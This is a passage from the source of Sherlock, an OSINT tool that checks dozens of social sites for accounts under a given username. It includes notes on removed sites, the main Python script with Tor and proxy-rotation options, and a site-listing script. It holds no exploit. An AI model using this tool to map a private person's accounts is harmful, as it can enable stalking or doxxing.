"http://www.shockwave.com/member/profiles/{}.jsp", 180 | "urlMain": "http://www.shockwave.com/", 181 | "username_claimed": "blue", 182 | "username_unclaimed": "noonewouldeverusethis" 183 | }, 184 | ``` 185 | 186 | ## Foursquare 187 | 188 | Usernames that exist are not detected. 189 | 190 | ``` 191 | "Foursquare": { 192 | "errorType": "status_code", 193 | "rank": 1843, 194 | "url": "https://foursquare.com/{}", 195 | "urlMain": "https://foursquare.com/", 196 | "username_claimed": "dens", 197 | "username_unclaimed": "noonewouldeverusethis7" 198 | }, 199 | ``` 200 | 201 | ## Khan Academy 202 | 203 | Usernames that don't exist are detected. First noticed 2019-10-25. 204 | 205 | ``` 206 | "Khan Academy": { 207 | "errorType": "status_code", 208 | "rank": 377, 209 | "url": "https://www.khanacademy.org/profile/{}", 210 | "urlMain": "https://www.khanacademy.org/", 211 | "username_claimed": "blue", 212 | "username_unclaimed": "noonewouldeverusethis7" 213 | }, 214 | ``` 215 | 216 | ## PayPal 217 | 218 | Usernames that don't exist are detected. 219 | 220 | ``` 221 | "PayPal": { 222 | "errorType": "response_url", 223 | "errorUrl": "https://www.paypal.com/paypalme2/404", 224 | "rank": 18441, 225 | "url": "https://www.paypal.com/paypalme2/{}", 226 | "urlMain": "https://www.paypal.me/", 227 | "username_claimed": "blue", 228 | "username_unclaimed": "noneownsthisusername" 229 | }, 230 | ``` 231 | 232 | ## EVE Online 233 | 234 | Usernames that exist are not detected. 235 | 236 | ``` 237 | "EVE Online": { 238 | "errorType": "response_url", 239 | "errorUrl": "https://eveonline.com", 240 | "rank": 15347, 241 | "url": "https://evewho.com/pilot/{}/", 242 | "urlMain": "https://eveonline.com", 243 | "username_claimed": "blue", 244 | "username_unclaimed": "noonewouldeverusethis7" 245 | }, 246 | ``` 247 | 248 | ## AngelList 249 | 250 | Usernames that exist are not detected. 251 | 252 | ``` 253 | "AngelList": { 254 | "errorType": "status_code", 255 | "rank": 5767, 256 | "url": "https://angel.co/{}", 257 | "urlMain": "https://angel.co/", 258 | "username_claimed": "blue", 259 | "username_unclaimed": "noonewouldeverusethis7" 260 | }, 261 | ``` 262 | 263 | ## Codepen 264 | 265 | Usernames that exist are not detected. 266 | 267 | ``` 268 | "Codepen": { 269 | "errorType": "status_code", 270 | "rank": 1359, 271 | "url": "https://codepen.io/{}", 272 | "urlMain": "https://codepen.io/", 273 | "username_claimed": "blue", 274 | "username_unclaimed": "noonewouldeverusethis7" 275 | }, 276 | ``` 277 | 278 | ## Imgur 279 | 280 | Looks like they made some changes to the site. Sherlock says that all 281 | usernames are available. 282 | 283 | ``` 284 | "Imgur": { 285 | "errorType": "status_code", 286 | "rank": 74, 287 | "url": "https://imgur.com/user/{}", 288 | "urlMain": "https://imgur.com/", 289 | "username_claimed": "blue", 290 | "username_unclaimed": "noonewouldeverusethis7" 291 | }, 292 | ``` 293 | 294 | ## PowerShell Gallery 295 | 296 | Accidentally merged even though the original pull request showed that all 297 | user names were available. 298 | 299 | ``` 300 | "PowerShell Gallery": { 301 | "errorType": "status_code", 302 | "rank": 163562, 303 | "url": "https://www.powershellgallery.com/profiles/{}", 304 | "urlMain": "https://www.powershellgallery.com", 305 | "username_claimed": "powershellteam", 306 | "username_unclaimed": "noonewouldeverusethis7" 307 | }, 308 | ``` 309 | 310 | ## LinkedIn 311 | 312 | This was attempted to be added around 2019-08-26, but the pull request was never merged. 313 | It turns out that LinkedIn requires that you have an account before they will let you 314 | check for other account. So, this site will not work with the current design of 315 | Sherlock. 316 | 317 | ## StreamMe 318 | 319 | On 2019-04-07, I get a Timed Out message from the website. It has not 320 | been working earlier either (for some weeks). It takes about 21s before 321 | the site finally times out, so it really makes getting the results from 322 | Sherlock a pain. 323 | 324 | If the site becomes available in the future, we can put it back in. 325 | 326 | ``` 327 | "StreamMe": { 328 | "errorType": "status_code", 329 | "rank": 31702, 330 | "url": "https://www.stream.me/{}", 331 | "urlMain": "https://www.stream.me/", 332 | "username_claimed": "blue", 333 | "username_unclaimed": "noonewouldeverusethis7" 334 | }, 335 | ``` 336 | 337 | ## BlackPlanet 338 | 339 | This site has always returned a false positive. The site returns the exact 340 | same text for a claimed or an unclaimed username. The site must be rendering 341 | all of the different content using Javascript in the browser. So, there is 342 | no way distinguish between the results with the current design of Sherlock. 343 | 344 | ``` 345 | "BlackPlanet": { 346 | "errorMsg": "My Hits", 347 | "errorType": "message", 348 | "rank": 110021, 349 | "url": "http://blackplanet.com/{}", 350 | "urlMain": "http://blackplanet.com/" 351 | }, 352 | ``` 353 | 354 | ## Fotolog 355 | 356 | Around 2019-02-09, I get a 502 HTTP error (bad gateway) for any access. On 357 | 2019-03-10, the site is up, but it is in maintenance mode. 358 | 359 | It does not seem to be working, so there is no sense in including it in 360 | Sherlock. 361 | 362 | ``` 363 | "Fotolog": { 364 | "errorType": "status_code", 365 | "rank": 47777, 366 | "url": "https://fotolog.com/{}", 367 | "urlMain": "https://fotolog.com/" 368 | }, 369 | ``` 370 | 371 | ## Google Plus 372 | 373 | On 2019-04-02, Google shutdown Google Plus. While the content for some 374 | users is available after that point, it is going away. And, no one will 375 | be able to create a new account. So, there is no value is keeping it in 376 | Sherlock. 377 | 378 | Good-bye [Google Plus](https://en.wikipedia.org/wiki/Google%2B)... 379 | 380 | ``` 381 | "Google Plus": { 382 | "errorType": "status_code", 383 | "rank": 1, 384 | "url": "https://plus.google.com/+{}", 385 | "urlMain": "https://plus.google.com/", 386 | "username_claimed": "davidbrin1", 387 | "username_unclaimed": "noonewouldeverusethis7" 388 | }, 389 | ``` 390 | 391 | ## CapFriendly 392 | 393 | As of 2020-02-17, CapFriendly returns fake profile pages for non-existing users, what seems to distinguish between the pages is the Sign-up date, for non-existing users, the web application returns a date before 2000-01-01. 394 | 395 | ``` 396 | "CapFriendly": { 397 | "errorMsg": "No User Found", 398 | "errorType": "message", 399 | "rank": 64100, 400 | "url": "https://www.capfriendly.com/users/{}", 401 | "urlMain": "https://www.capfriendly.com/", 402 | "username_claimed": "user", 403 | "username_unclaimed": "noonewouldeverusethis" 404 | }, 405 | ``` 406 | 407 | 408 | ## Furaffinity 409 | 410 | As of 2020-02-23, Furaffinity returns false postives because they are now using Cloudflair, which prevents Sherlock from checking if the user 411 | exists or not. 412 | 413 | ``` 414 | "furaffinity": { 415 | "errorMsg": "user cannot be found", 416 | "errorType": "message", 417 | "rank": 0, 418 | "url": "https://www.furaffinity.net/user/{}", 419 | "urlMain": "https://www.furaffinity.net", 420 | "username_claimed": "blue", 421 | "username_unclaimed": "noonewouldeverusethis777777" 422 | }, 423 | ``` 424 | 425 | 426 | ## InsaneJournal 427 | 428 | As of 2020-02-23, InsaneJournal returns false positive, when providing a username which contains a period. 429 | Since we were not able to find the critera for a valid username, the best thing to do now is to remove it. 430 | 431 | ``` 432 | "InsaneJournal": { 433 | "errorMsg": "Unknown user", 434 | "errorType": "message", 435 | "rank": 29728, 436 | "url": "http://{}.insanejournal.com/profile", 437 | "urlMain": "insanejournal.com", 438 | "username_claimed": "blue", 439 | "username_unclaimed": "dlyr6cd" 440 | }, 441 | ``` 442 | -------------------------------------------------------------------------------- /sherlock/requirements.txt: -------------------------------------------------------------------------------- 1 | beautifulsoup4>=4.8.0 2 | bs4>=0.0.1 3 | certifi>=2019.6.16 4 | colorama>=0.4.1 5 | lxml>=4.4.0 6 | PySocks>=1.7.0 7 | requests>=2.22.0 8 | requests-futures>=1.0.0 9 | soupsieve>=1.9.2 10 | stem>=1.8.0 11 | torrequest>=0.1.0 12 | -------------------------------------------------------------------------------- /sherlock/sherlock.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python3 2 | 3 | """ 4 | Sherlock: Find Usernames Across Social Networks Module 5 | 6 | This module contains the main logic to search for usernames at social 7 | networks. 8 | """ 9 | 10 | import csv 11 | import json 12 | import os 13 | import platform 14 | import re 15 | import sys 16 | import random 17 | from argparse import ArgumentParser, RawDescriptionHelpFormatter 18 | from concurrent.futures import ThreadPoolExecutor 19 | from time import time 20 | import webbrowser 21 | 22 | import requests 23 | from colorama import Fore, Style, init 24 | 25 | from requests_futures.sessions import FuturesSession 26 | from torrequest import TorRequest 27 | from load_proxies import load_proxies_from_csv, check_proxy_list 28 | 29 | module_name = "Sherlock: Find Usernames Across Social Networks" 30 | __version__ = "0.10.9" 31 | 32 | 33 | global proxy_list 34 | 35 | proxy_list = [] 36 | 37 | class ElapsedFuturesSession(FuturesSession): 38 | """ 39 | Extends FutureSession to add a response time metric to each request. 40 | 41 | This is taken (almost) directly from here: https://github.com/ross/requests-futures#working-in-the-background 42 | """ 43 | 44 | def request(self, method, url, hooks={}, *args, **kwargs): 45 | start = time() 46 | 47 | def timing(r, *args, **kwargs): 48 | elapsed_sec = time() - start 49 | r.elapsed = round(elapsed_sec * 1000) 50 | 51 | try: 52 | if isinstance(hooks['response'], (list, tuple)): 53 | # needs to be first so we don't time other hooks execution 54 | hooks['response'].insert(0, timing) 55 | else: 56 | hooks['response'] = [timing, hooks['response']] 57 | except KeyError: 58 | hooks['response'] = timing 59 | 60 | return super(ElapsedFuturesSession, self).request(method, url, hooks=hooks, *args, **kwargs) 61 | 62 | 63 | def print_info(title, info, color=True): 64 | if color: 65 | print(Style.BRIGHT + Fore.GREEN + "[" + 66 | Fore.YELLOW + "*" + 67 | Fore.GREEN + f"] {title}" + 68 | Fore.WHITE + f" {info}" + 69 | Fore.GREEN + " on:") 70 | else: 71 | print(f"[*] {title} {info} on:") 72 | 73 | def print_error(err, errstr, var, verbose=False, color=True): 74 | if color: 75 | print(Style.BRIGHT + Fore.WHITE + "[" + 76 | Fore.RED + "-" + 77 | Fore.WHITE + "]" + 78 | Fore.RED + f" {errstr}" + 79 | Fore.YELLOW + f" {err if verbose else var}") 80 | else: 81 | print(f"[-] {errstr} {err if verbose else var}") 82 | 83 | 84 | def format_response_time(response_time, verbose): 85 | return " [{} ms]".format(response_time) if verbose else "" 86 | 87 | 88 | def print_found(social_network, url, response_time, verbose=False, color=True): 89 | if color: 90 | print((Style.BRIGHT + Fore.WHITE + "[" + 91 | Fore.GREEN + "+" + 92 | Fore.WHITE + "]" + 93 | format_response_time(response_time, verbose) + 94 | Fore.GREEN + f" {social_network}:"), url) 95 | else: 96 | print(f"[+]{format_response_time(response_time, verbose)} {social_network}: {url}") 97 | 98 | def print_not_found(social_network, response_time, verbose=False, color=True): 99 | if color: 100 | print((Style.BRIGHT + Fore.WHITE + "[" + 101 | Fore.RED + "-" + 102 | Fore.WHITE + "]" + 103 | format_response_time(response_time, verbose) + 104 | Fore.GREEN + f" {social_network}:" + 105 | Fore.YELLOW + " Not Found!")) 106 | else: 107 | print(f"[-]{format_response_time(response_time, verbose)} {social_network}: Not Found!") 108 | 109 | def print_invalid(social_network, msg, color=True): 110 | """Print invalid search result.""" 111 | if color: 112 | print((Style.BRIGHT + Fore.WHITE + "[" + 113 | Fore.RED + "-" + 114 | Fore.WHITE + "]" + 115 | Fore.GREEN + f" {social_network}:" + 116 | Fore.YELLOW + f" {msg}")) 117 | else: 118 | print(f"[-] {social_network} {msg}") 119 | 120 | 121 | def get_response(request_future, error_type, social_network, verbose=False, retry_no=None, color=True): 122 | 123 | global proxy_list 124 | 125 | try: 126 | rsp = request_future.result() 127 | if rsp.status_code: 128 | return rsp, error_type, rsp.elapsed 129 | except requests.exceptions.HTTPError as errh: 130 | print_error(errh, "HTTP Error:", social_network, verbose, color) 131 | 132 | # In case our proxy fails, we retry with another proxy. 133 | except requests.exceptions.ProxyError as errp: 134 | if retry_no>0 and len(proxy_list)>0: 135 | #Selecting the new proxy. 136 | new_proxy = random.choice(proxy_list) 137 | new_proxy = f'{new_proxy.protocol}://{new_proxy.ip}:{new_proxy.port}' 138 | print(f'Retrying with {new_proxy}') 139 | request_future.proxy = {'http':new_proxy,'https':new_proxy} 140 | get_response(request_future,error_type, social_network, verbose,retry_no=retry_no-1, color=color) 141 | else: 142 | print_error(errp, "Proxy error:", social_network, verbose, color) 143 | except requests.exceptions.ConnectionError as errc: 144 | print_error(errc, "Error Connecting:", social_network, verbose, color) 145 | except requests.exceptions.Timeout as errt: 146 | print_error(errt, "Timeout Error:", social_network, verbose, color) 147 | except requests.exceptions.RequestException as err: 148 | print_error(err, "Unknown error:", social_network, verbose, color) 149 | return None, "", -1 150 | 151 | 152 | def sherlock(username, site_data, verbose=False, tor=False, unique_tor=False, 153 | proxy=None, print_found_only=False, timeout=None, color=True): 154 | """Run Sherlock Analysis. 155 | 156 | Checks for existence of username on various social media sites. 157 | 158 | Keyword Arguments: 159 | username -- String indicating username that report 160 | should be created against. 161 | site_data -- Dictionary containing all of the site data. 162 | verbose -- Boolean indicating whether to give verbose output. 163 | tor -- Boolean indicating whether to use a tor circuit for the requests. 164 | unique_tor -- Boolean indicating whether to use a new tor circuit for each request. 165 | proxy -- String indicating the proxy URL 166 | timeout -- Time in seconds to wait before timing out request. 167 | Default is no timeout. 168 | color -- Boolean indicating whether to color terminal output 169 | 170 | Return Value: 171 | Dictionary containing results from report. Key of dictionary is the name 172 | of the social network site, and the value is another dictionary with 173 | the following keys: 174 | url_main: URL of main site. 175 | url_user: URL of user on site (if account exists). 176 | exists: String indicating results of test for account existence. 177 | http_status: HTTP status code of query which checked for existence on 178 | site. 179 | response_text: Text that came back from request. May be None if 180 | there was an HTTP error when checking for existence. 181 | """ 182 | print_info("Checking username", username, color) 183 | 184 | # Create session based on request methodology 185 | if tor or unique_tor: 186 | #Requests using Tor obfuscation 187 | underlying_request = TorRequest() 188 | underlying_session = underlying_request.session 189 | else: 190 | #Normal requests 191 | underlying_session = requests.session() 192 | underlying_request = requests.Request() 193 | 194 | #Limit number of workers to 20. 195 | #This is probably vastly overkill. 196 | if len(site_data) >= 20: 197 | max_workers=20 198 | else: 199 | max_workers=len(site_data) 200 | 201 | #Create multi-threaded session for all requests. 202 | session = ElapsedFuturesSession(max_workers=max_workers, 203 | session=underlying_session) 204 | 205 | # Results from analysis of all sites 206 | results_total = {} 207 | 208 | # First create futures for all requests. This allows for the requests to run in parallel 209 | for social_network, net_info in site_data.items(): 210 | 211 | # Results from analysis of this specific site 212 | results_site = {} 213 | 214 | # Record URL of main site 215 | results_site['url_main'] = net_info.get("urlMain") 216 | 217 | # A user agent is needed because some sites don't return the correct 218 | # information since they think that we are bots (Which we actually are...) 219 | headers = { 220 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0', 221 | } 222 | 223 | if "headers" in net_info: 224 | # Override/append any extra headers required by a given site. 225 | headers.update(net_info["headers"]) 226 | 227 | # Don't make request if username is invalid for the site 228 | regex_check = net_info.get("regexCheck") 229 | if regex_check and re.search(regex_check, username) is None: 230 | # No need to do the check at the site: this user name is not allowed. 231 | if not print_found_only: 232 | print_invalid(social_network, "Illegal Username Format For This Site!", color) 233 | 234 | results_site["exists"] = "illegal" 235 | results_site["url_user"] = "" 236 | results_site['http_status'] = "" 237 | results_site['response_text'] = "" 238 | results_site['response_time_ms'] = "" 239 | else: 240 | # URL of user on site (if it exists) 241 | url = net_info["url"].format(username) 242 | results_site["url_user"] = url 243 | url_probe = net_info.get("urlProbe") 244 | if url_probe is None: 245 | # Probe URL is normal one seen by people out on the web. 246 | url_probe = url 247 | else: 248 | # There is a special URL for probing existence separate 249 | # from where the user profile normally can be found. 250 | url_probe = url_probe.format(username) 251 | 252 | #If only the status_code is needed don't download the body 253 | if net_info["errorType"] == 'status_code': 254 | request_method = session.head 255 | else: 256 | request_method = session.get 257 | 258 | if net_info["errorType"] == "response_url": 259 | # Site forwards request to a different URL if username not 260 | # found. Disallow the redirect so we can capture the 261 | # http status from the original URL request. 262 | allow_redirects = False 263 | else: 264 | # Allow whatever redirect that the site wants to do. 265 | # The final result of the request will be what is available. 266 | allow_redirects = True 267 | 268 | # This future starts running the request in a new thread, doesn't block the main thread 269 | if proxy != None: 270 | proxies = {"http": proxy, "https": proxy} 271 | future = request_method(url=url_probe, headers=headers, 272 | proxies=proxies, 273 | allow_redirects=allow_redirects, 274 | timeout=timeout 275 | ) 276 | else: 277 | future = request_method(url=url_probe, headers=headers, 278 | allow_redirects=allow_redirects, 279 | timeout=timeout 280 | ) 281 | 282 | # Store future in data for access later 283 | net_info["request_future"] = future 284 | 285 | # Reset identify for tor (if needed) 286 | if unique_tor: 287 | underlying_request.reset_identity() 288 | 289 | # Add this site's results into final dictionary with all of the other results. 290 | results_total[social_network] = results_site 291 | 292 | # Open the file containing account links 293 | # Core logic: If tor requests, make them here. If multi-threaded requests, wait for responses 294 | for social_network, net_info in site_data.items(): 295 | 296 | # Retrieve results again 297 | results_site = results_total.get(social_network) 298 | 299 | # Retrieve other site information again 300 | url = results_site.get("url_user") 301 | exists = results_site.get("exists") 302 | if exists is not None: 303 | # We have already determined the user doesn't exist here 304 | continue 305 | 306 | # Get the expected error type 307 | error_type = net_info["errorType"] 308 | 309 | # Default data in case there are any failures in doing a request. 310 | http_status = "?" 311 | response_text = "" 312 | 313 | # Retrieve future and ensure it has finished 314 | future = net_info["request_future"] 315 | r, error_type, response_time = get_response(request_future=future, 316 | error_type=error_type, 317 | social_network=social_network, 318 | verbose=verbose, 319 | retry_no=3, 320 | color=color) 321 | 322 | # Attempt to get request information 323 | try: 324 | http_status = r.status_code 325 | except: 326 | pass 327 | try: 328 | response_text = r.text.encode(r.encoding) 329 | except: 330 | pass 331 | 332 | if error_type == "message": 333 | error = net_info.get("errorMsg") 334 | # Checks if the error message is in the HTML 335 | if not error in r.text: 336 | print_found(social_network, url, response_time, verbose, color) 337 | exists = "yes" 338 | else: 339 | if not print_found_only: 340 | print_not_found(social_network, response_time, verbose, color) 341 | exists = "no" 342 | 343 | elif error_type == "status_code": 344 | # Checks if the status code of the response is 2XX 345 | if not r.status_code >= 300 or r.status_code < 200: 346 | print_found(social_network, url, response_time, verbose, color) 347 | exists = "yes" 348 | else: 349 | if not print_found_only: 350 | print_not_found(social_network, response_time, verbose, color) 351 | exists = "no" 352 | 353 | elif error_type == "response_url": 354 | # For this detection method, we have turned off the redirect. 355 | # So, there is no need to check the response URL: it will always 356 | # match the request. Instead, we will ensure that the response 357 | # code indicates that the request was successful (i.e. no 404, or 358 | # forward to some odd redirect). 359 | if 200 <= r.status_code < 300: 360 | # 361 | print_found(social_network, url, response_time, verbose, color) 362 | exists = "yes" 363 | else: 364 | if not print_found_only: 365 | print_not_found(social_network, response_time, verbose, color) 366 | exists = "no" 367 | 368 | elif error_type == "": 369 | if not print_found_only: 370 | print_invalid(social_network, "Error!", color) 371 | exists = "error" 372 | 373 | # Save exists flag 374 | results_site['exists'] = exists 375 | 376 | # Save results from request 377 | results_site['http_status'] = http_status 378 | results_site['response_text'] = response_text 379 | results_site['response_time_ms'] = response_time 380 | 381 | # Add this site's results into final dictionary with all of the other results. 382 | results_total[social_network] = results_site 383 | return results_total 384 | 385 | 386 | def timeout_check(value): 387 | """Check Timeout Argument. 388 | 389 | Checks timeout for validity. 390 | 391 | Keyword Arguments: 392 | value -- Time in seconds to wait before timing out request. 393 | 394 | Return Value: 395 | Floating point number representing the time (in seconds) that should be 396 | used for the timeout. 397 | 398 | NOTE: Will raise an exception if the timeout in invalid. 399 | """ 400 | from argparse import ArgumentTypeError 401 | 402 | try: 403 | timeout = float(value) 404 | except: 405 | raise ArgumentTypeError(f"Timeout '{value}' must be a number.") 406 | if timeout <= 0: 407 | raise ArgumentTypeError(f"Timeout '{value}' must be greater than 0.0s.") 408 | return timeout 409 | 410 | 411 | def main(): 412 | # Colorama module's initialization. 413 | init(autoreset=True) 414 | 415 | version_string = f"%(prog)s {__version__}\n" + \ 416 | f"{requests.__description__}: {requests.__version__}\n" + \ 417 | f"Python: {platform.python_version()}" 418 | 419 | parser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter, 420 | description=f"{module_name} (Version {__version__})" 421 | ) 422 | parser.add_argument("--version", 423 | action="version", version=version_string, 424 | help="Display version information and dependencies." 425 | ) 426 | parser.add_argument("--verbose", "-v", "-d", "--debug", 427 | action="store_true", dest="verbose", default=False, 428 | help="Display extra debugging information and metrics." 429 | ) 430 | parser.add_argument("--rank", "-r", 431 | action="store_true", dest="rank", default=False, 432 | help="Present websites ordered by their Alexa.com global rank in popularity.") 433 | parser.add_argument("--folderoutput", "-fo", dest="folderoutput", 434 | help="If using multiple usernames, the output of the results will be saved to this folder." 435 | ) 436 | parser.add_argument("--output", "-o", dest="output", 437 | help="If using single username, the output of the result will be saved to this file." 438 | ) 439 | parser.add_argument("--tor", "-t", 440 | action="store_true", dest="tor", default=False, 441 | help="Make requests over Tor; increases runtime; requires Tor to be installed and in system path.") 442 | parser.add_argument("--unique-tor", "-u", 443 | action="store_true", dest="unique_tor", default=False, 444 | help="Make requests over Tor with new Tor circuit after each request; increases runtime; requires Tor to be installed and in system path.") 445 | parser.add_argument("--csv", 446 | action="store_true", dest="csv", default=False, 447 | help="Create Comma-Separated Values (CSV) File." 448 | ) 449 | parser.add_argument("--site", 450 | action="append", metavar='SITE_NAME', 451 | dest="site_list", default=None, 452 | help="Limit analysis to just the listed sites. Add multiple options to specify more than one site." 453 | ) 454 | parser.add_argument("--proxy", "-p", metavar='PROXY_URL', 455 | action="store", dest="proxy", default=None, 456 | help="Make requests over a proxy. e.g. socks5://127.0.0.1:1080" 457 | ) 458 | parser.add_argument("--json", "-j", metavar="JSON_FILE", 459 | dest="json_file", default="data.json", 460 | help="Load data from a JSON file or an online, valid, JSON file.") 461 | parser.add_argument("--proxy_list", "-pl", metavar='PROXY_LIST', 462 | action="store", dest="proxy_list", default=None, 463 | help="Make requests over a proxy randomly chosen from a list generated from a .csv file." 464 | ) 465 | parser.add_argument("--check_proxies", "-cp", metavar='CHECK_PROXY', 466 | action="store", dest="check_prox", default=None, 467 | help="To be used with the '--proxy_list' parameter. " 468 | "The script will check if the proxies supplied in the .csv file are working and anonymous." 469 | "Put 0 for no limit on successfully checked proxies, or another number to institute a limit." 470 | ) 471 | parser.add_argument("--timeout", 472 | action="store", metavar='TIMEOUT', 473 | dest="timeout", type=timeout_check, default=None, 474 | help="Time (in seconds) to wait for response to requests. " 475 | "Default timeout of 60.0s." 476 | "A longer timeout will be more likely to get results from slow sites." 477 | "On the other hand, this may cause a long delay to gather all results." 478 | ) 479 | parser.add_argument("--print-found", 480 | action="store_true", dest="print_found_only", default=False, 481 | help="Do not output sites where the username was not found." 482 | ) 483 | parser.add_argument("--no-color", 484 | action="store_true", dest="no_color", default=False, 485 | help="Don't color terminal output" 486 | ) 487 | parser.add_argument("username", 488 | nargs='+', metavar='USERNAMES', 489 | action="store", 490 | help="One or more usernames to check with social networks." 491 | ) 492 | parser.add_argument("--browse", "-b", 493 | action="store_true", dest="browse", default=False, 494 | help="Browse to all results on default bowser.") 495 | 496 | args = parser.parse_args() 497 | 498 | 499 | # Argument check 500 | # TODO regex check on args.proxy 501 | if args.tor and (args.proxy != None or args.proxy_list != None): 502 | raise Exception("Tor and Proxy cannot be set in the meantime.") 503 | 504 | # Proxy argument check. 505 | # Does not necessarily need to throw an error, 506 | # since we could join the single proxy with the ones generated from the .csv, 507 | # but it seems unnecessarily complex at this time. 508 | if args.proxy != None and args.proxy_list != None: 509 | raise Exception("A single proxy cannot be used along with proxy list.") 510 | 511 | # Make prompts 512 | if args.proxy != None: 513 | print("Using the proxy: " + args.proxy) 514 | 515 | global proxy_list 516 | 517 | if args.proxy_list != None: 518 | print_info("Loading proxies from", args.proxy_list, not args.color) 519 | 520 | proxy_list = load_proxies_from_csv(args.proxy_list) 521 | 522 | # Checking if proxies should be checked for anonymity. 523 | if args.check_prox != None and args.proxy_list != None: 524 | try: 525 | limit = int(args.check_prox) 526 | if limit == 0: 527 | proxy_list = check_proxy_list(proxy_list) 528 | elif limit > 0: 529 | proxy_list = check_proxy_list(proxy_list, limit) 530 | else: 531 | raise ValueError 532 | except ValueError: 533 | raise Exception("Parameter --check_proxies/-cp must be a positive integer.") 534 | 535 | if args.tor or args.unique_tor: 536 | print("Using Tor to make requests") 537 | print("Warning: some websites might refuse connecting over Tor, so note that using this option might increase connection errors.") 538 | 539 | # Check if both output methods are entered as input. 540 | if args.output is not None and args.folderoutput is not None: 541 | print("You can only use one of the output methods.") 542 | sys.exit(1) 543 | 544 | # Check validity for single username output. 545 | if args.output is not None and len(args.username) != 1: 546 | print("You can only use --output with a single username") 547 | sys.exit(1) 548 | 549 | response_json_online = None 550 | site_data_all = None 551 | 552 | # Try to load json from website. 553 | try: 554 | response_json_online = requests.get(url=args.json_file) 555 | except requests.exceptions.MissingSchema: # In case the schema is wrong it's because it may not be a website 556 | pass 557 | 558 | # Check if the response is appropriate. 559 | if response_json_online is not None and response_json_online.status_code == 200: 560 | # Since we got data from a website, try to load json and exit if parsing fails. 561 | try: 562 | site_data_all = response_json_online.json() 563 | except ValueError: 564 | print("Invalid JSON from website!") 565 | sys.exit(1) 566 | pass 567 | 568 | data_file_path = os.path.join(os.path.dirname( 569 | os.path.realpath(__file__)), args.json_file) 570 | # This will be none if the request had a missing schema 571 | if site_data_all is None: 572 | # Check if the file exists otherwise exit. 573 | if not os.path.exists(data_file_path): 574 | print("JSON file doesn't exist.") 575 | print( 576 | "If this is not a file but a website, make sure you have appended http:// or https://.") 577 | sys.exit(1) 578 | else: 579 | raw = open(data_file_path, "r", encoding="utf-8") 580 | try: 581 | site_data_all = json.load(raw) 582 | except: 583 | print("Invalid JSON loaded from file.") 584 | 585 | if args.site_list is None: 586 | # Not desired to look at a sub-set of sites 587 | site_data = site_data_all 588 | else: 589 | # User desires to selectively run queries on a sub-set of the site list. 590 | 591 | # Make sure that the sites are supported & build up pruned site database. 592 | site_data = {} 593 | site_missing = [] 594 | for site in args.site_list: 595 | for existing_site in site_data_all: 596 | if site.lower() == existing_site.lower(): 597 | site_data[existing_site] = site_data_all[existing_site] 598 | if not site_data: 599 | # Build up list of sites not supported for future error message. 600 | site_missing.append(f"'{site}'") 601 | 602 | if site_missing: 603 | print( 604 | f"Error: Desired sites not found: {', '.join(site_missing)}.") 605 | sys.exit(1) 606 | 607 | if args.rank: 608 | # Sort data by rank 609 | site_dataCpy = dict(site_data) 610 | ranked_sites = sorted(site_data, key=lambda k: ("rank" not in k, site_data[k].get("rank", sys.maxsize))) 611 | site_data = {} 612 | for site in ranked_sites: 613 | site_data[site] = site_dataCpy.get(site) 614 | 615 | # Run report on all specified users. 616 | for username in args.username: 617 | print() 618 | 619 | if args.output: 620 | file = open(args.output, "w", encoding="utf-8") 621 | elif args.folderoutput: # In case we handle multiple usernames at a targetted folder. 622 | # If the folder doesnt exist, create it first 623 | if not os.path.isdir(args.folderoutput): 624 | os.mkdir(args.folderoutput) 625 | file = open(os.path.join(args.folderoutput, 626 | username + ".txt"), "w", encoding="utf-8") 627 | else: 628 | file = open(username + ".txt", "w", encoding="utf-8") 629 | 630 | # We try to ad a random member of the 'proxy_list' var as the proxy of the request. 631 | # If we can't access the list or it is empty, we proceed with args.proxy as the proxy. 632 | try: 633 | random_proxy = random.choice(proxy_list) 634 | proxy = f'{random_proxy.protocol}://{random_proxy.ip}:{random_proxy.port}' 635 | except (NameError, IndexError): 636 | proxy = args.proxy 637 | 638 | results = sherlock(username, 639 | site_data, 640 | verbose=args.verbose, 641 | tor=args.tor, 642 | unique_tor=args.unique_tor, 643 | proxy=args.proxy, 644 | print_found_only=args.print_found_only, 645 | timeout=args.timeout, 646 | color=not args.no_color) 647 | 648 | exists_counter = 0 649 | for website_name in results: 650 | dictionary = results[website_name] 651 | if dictionary.get("exists") == "yes": 652 | exists_counter += 1 653 | file.write(dictionary["url_user"] + "\n") 654 | if args.browse : 655 | webbrowser.open(dictionary["url_user"]) 656 | file.write(f"Total Websites Username Detected On : {exists_counter}") 657 | file.close() 658 | 659 | if args.csv == True: 660 | with open(username + ".csv", "w", newline='', encoding="utf-8") as csv_report: 661 | writer = csv.writer(csv_report) 662 | writer.writerow(['username', 663 | 'name', 664 | 'url_main', 665 | 'url_user', 666 | 'exists', 667 | 'http_status', 668 | 'response_time_ms' 669 | ] 670 | ) 671 | for site in results: 672 | writer.writerow([username, 673 | site, 674 | results[site]['url_main'], 675 | results[site]['url_user'], 676 | results[site]['exists'], 677 | results[site]['http_status'], 678 | results[site]['response_time_ms'] 679 | ] 680 | ) 681 | 682 | 683 | if __name__ == "__main__": 684 | main() 685 | -------------------------------------------------------------------------------- /sherlock/site_list.py: -------------------------------------------------------------------------------- 1 | """Sherlock: Supported Site Listing 2 | This module generates the listing of supported sites. 3 | """ 4 | import json 5 | import sys 6 | import requests 7 | import threading 8 | import xml.etree.ElementTree as ET 9 | from datetime import datetime 10 | from argparse import ArgumentParser, RawDescriptionHelpFormatter 11 | 12 | pool = list() 13 | 14 | def get_rank(domain_to_query, dest): 15 | 16 | #Retrieve ranking data via alexa API 17 | url = f"http://data.alexa.com/data?cli=10&url={domain_to_query}" 18 | xml_data = requests.get(url).text 19 | root = ET.fromstring(xml_data) 20 | try: 21 | #Get ranking for this site. 22 | dest['rank'] = int(root.find(".//REACH").attrib["RANK"]) 23 | except: 24 | #We did not find the rank for some reason. 25 | print(f"Error retrieving rank information for '{domain_to_query}'") 26 | print(f" Returned XML is |{xml_data}|") 27 | 28 | return 29 | 30 | parser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter 31 | ) 32 | parser.add_argument("--rank","-r", 33 | action="store_true", dest="rank", default=False, 34 | help="Update all website ranks (not recommended)." 35 | ) 36 | args = parser.parse_args() 37 | 38 | with open("data.json", "r", encoding="utf-8") as data_file: 39 | data = json.load(data_file) 40 | 41 | with open("sites.md", "w") as site_file: 42 | data_length = len(data) 43 | site_file.write(f'## List Of Supported Sites 